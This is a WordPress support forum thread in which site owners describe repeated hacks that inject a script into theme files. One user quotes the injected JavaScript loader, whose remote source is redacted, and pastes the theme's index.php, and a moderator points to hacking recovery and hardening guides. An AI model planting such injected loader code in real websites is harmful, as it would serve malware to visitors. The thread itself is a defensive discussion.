It can be a case of site defacement/ Hacktivism. They do not appear to be infected because they do not leave any malware/ adware/ viruses.
Got the same!
Question: How did that get in there?!
It could be one of the following:
1) You have a backdoor that was installed by an attacker on your site that will allow them to modify the file at anytime. Usually a PHP shell script. Sucuri does not locate these.
2) Your FTP account(s) have been compromised. Change all passwords to all FTP accounts and your cpanel account. Sucuri can’t detect this.
3) No file? Still problem after you change passwords? Talk to your hosting company – they have a server wide issue.
This hack is easy to bypass any type of automated system because they typically look for encoded strings, and this isn’t.
Back when the site was set up BlueHost required the manual installation of the php.ini file. I’m going to have a look at that (and whether or not it’s still necessary.
Only the main account seems to be getting hacked, the secondary sites are not.
I’ve replaced all of the WordPress files manually, as well as the plugins.
I understand that Sucuri can’t find certain types of files, but it’s not even catching the script at the top of the CSS file, even though it’s in their library (in fact, the only references to it online, in English, anyway).
BlueHost hasn’t responded to my support inquiry. That’s not a good sign.
Have you contacted Sucuri about this?
Have you tried http://www.unmaskparasites.com/
Hi !
I’ve the same problem.
When I open the index.php files, there is a link to a remote file call “check.php”.
The content of the file is:
if(navigator.javaEnabled()) {
document.write(' <script src="[ redacted, don't share that here ]"></script>');
}
It’s written that it is a remote file but I can’t find where this file is called on index.php.
Here is the content of the Index.php
<?php include(TEMPLATEPATH . "/includes/head.php"); ?>
<div id="container">
<div id="header">
<?php include(TEMPLATEPATH . "/includes/header.php"); ?>
</div>
<div class="clear"></div>
<div id="content">
<?php $slider_option = get_option(THEMESHORTNAME."_show_image_slider", "slider");
if($slider_option == "slider") {
$slider_type = get_option(THEMESHORTNAME."_main_slider_type", "flash");
if($slider_type == "flash") {
?>
<div id="slider-container" style="height: <?php echo get_option(THEMESHORTNAME."_main_slider_height", 400); ?>px;"></div>
<?php } else { ?>
<div id="jquery-slider-container" style="height: <?php echo get_option(THEMESHORTNAME."_main_slider_height", 400); ?>px;"></div>
<?php
}
}
else if($slider_option == "image") {
$img_url = fs_get_image_from_option(get_option(THEMESHORTNAME."_slider_image", ""), 'full');
if($img_url != "") { ?>
<img width="960" src="<?php echo $img_url; ?>" alt="" />
<?php
}
}
$image_index = 0;
?>
<div id="flashShadow"></div>
<?php if(get_option(THEMESHORTNAME."_show_slider1", "no") == "yes") { ?>
<div id="slider">
<ul>
<?php
$opt = get_option(THEMESHORTNAME."_slider1_type", "");
$slider_posts = array();
if($opt == "cat")
{
$slider_posts = get_posts('numberposts=-1&orderby=date&order=DESC&category='.get_option(THEMESHORTNAME."_slider1_cat", ""));
}
else if($opt == "editor")
{
$slider_posts_ids = explode(",", get_option(THEMESHORTNAME."_slider1_posts", ""));
foreach($slider_posts_ids as $post_id)
if(is_numeric($post_id))
$slider_posts[] = get_post($post_id);
}
global $wp_query;
$wp_query->in_the_loop = true;
for($i = 0; $i*3 < count($slider_posts); $i++)
{
echo '<li>';
for($pi = 0; $pi < 3 && $i*3 + $pi < count($slider_posts); $pi++)
{
$post = get_post($slider_posts[$i*3 + $pi]->ID);
setup_postdata($post);
$img_url = fs_get_post_image($post->ID, 'medium');
echo '<div class="newsBox">'."\n";
if($img_url != "")
{
echo '<div class="newsBoxImage">';
if($i == 0)
{
echo ' <div id="image_holder_'.($image_index++).'" class="newsBoxImage">'."\n";
echo ' <a href="'.get_permalink($post->ID).'">'."\n";
echo ' <span class="image_holder_span">'."\n";
echo ' <img alt="" src="'.$img_url.'" />'."\n";
echo ' </span>'."\n";
echo ' '.get_loading_span(300, 170)."\n";
echo ' </a>'."\n";
echo ' </div>'."\n";
}
else
{
echo '<a href="'.get_permalink($post->ID).'"><img alt="" src="'.$img_url.'" /></a>';
}
echo '</div>';
}
echo '<div class="newsBoxTitle"><div class="newsH2"><a href="'.get_permalink().'">'.get_the_title().'</a></div></div><div class="newsBoxText">'.strip_shortcodes(get_the_content('')).'</div></div>';
}
echo '</li>';
}
?>
</ul>
</div>
<?php } ?>
<div class="clear"></div>
<div class="line"></div>
<?php if(get_option(THEMESHORTNAME."_show_imagelist", "no") == "yes") { ?>
<ul id="imageList">
<?php
$opt = get_option(THEMESHORTNAME."_imagelist_type", "");
$imagelist_posts_ids = array();
if($opt == "cat")
{
$imagelist_posts = get_posts('numberposts=-1&orderby=date&order=DESC&category='.get_option(THEMESHORTNAME."_imagelist_cat", ""));
foreach($imagelist_posts as $imagelist_post)
$imagelist_posts_ids[] = $imagelist_post->ID;
}
else if($opt == "editor")
{
$imagelist_posts_ids = explode(",", get_option(THEMESHORTNAME."_imagelist_posts", ""));
}
$c = 0;
foreach($imagelist_posts_ids as $post_id)
{
if(!is_numeric($post_id))
continue;
$img_url = fs_get_post_image($post_id, 'thumbnail');
if($img_url != "") {
$post = get_post($post_id);
echo '<li><div id="image_holder_'.($image_index++).'" class="thumbGalleryItem">'."\n";
echo ' <a href="'.get_permalink($post_id).'" title="'.$post->post_title.'">'."\n";
echo ' <span class="image_holder_span">'."\n";
echo ' <img title="'.$post->post_title.'" alt="'.$post->post_title.'" src="'.$img_url.'" />'."\n";
echo ' </span>'."\n";
echo ' ' . get_loading_span(110, 110) . "\n";
echo ' </a>'."\n";
echo '</div></li>'."\n";
}
else
echo '<li><a href="'.get_permalink($post_id).'"></a></li>';
if(++$c >= 7)
break;
}
?>
</ul>
<?php } ?>
</div>
<div class="clear"></div>
<div id="footer" style="margin-top: 20px;">
<?php include(TEMPLATEPATH . "/includes/footer.php"); ?>
</div>
</div>
</body>
</html>
Does anyone has the same issue ?
Good luck and thanks for your help !
I’ve removed the hacked from:
style.css
index.php,
The problem is gone. I will change all the passwords to be sure that it doesn’t come back !
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
The problem is gone.
I’m sorry to say this, but it’s probably not gone. You’re dealing with the symptoms but not dealing with the cause.
Please at a minimum give this a review.
http://codex.wordpress.org/FAQ_My_site_was_hacked
And consider hardening your installation.
http://codex.wordpress.org/Hardening_WordPress
Good luck.
I’ve searched yet again. The problem is becoming more wide-spread. Of the other sites I’ve found with the same code injection (it’s mostly going to robots.txt file on others), none are with the same hosting company.
I’ve changed all passwords to secure ones that are quite complicated (both to cpanel/ftp and WP itself). I’ve only got plugins that I use on countless sites… with the exception of nexgen gallery.
All of the WP files and plug files were installed with fresh downloads from the WordPress repository.
I don’t use default table names, nor any account with ‘admin’ in the username.
Theme style.css file is already set with 644 file permission.
I’ve secured the wp-config and include files.
If were more reports of it being on this specific host, or if any of the other installations on this host had been attacked I’d suspect the host, but I’m not sure. Could, of course, just be the particular server I’m on. Guess that’s the next place for me to look.
I manage over 2 dozen sites. This is the only one getting hacked and it’s making me a bit nuts.
Today I’ve had my 21st and 22nd site hacks with a similar situation. My blog http://www.cuteculturechick.com was hosted on Bluehost at the time of the first hack, and I use the Genesis theme.
I’ve scrubbed my code several times, reinstalled Genesis, reinstalled my child theme. reinstalled WP a few times, change my passwords every week, keep WP and my plugins updated, and I still get the malware script injected as a header right widget. After 15 hacks in 4 months, I thought it was a hosting issue so I switched to Hostdime for hosting. In the last 6 weeks, I’ve been hacked 6 times.
Did you have any resolution to this, Valerama? I’m getting so frustrated.
Andrew Nevins
(@anevins)
WCLDN 2018 Contributor | Volunteer support
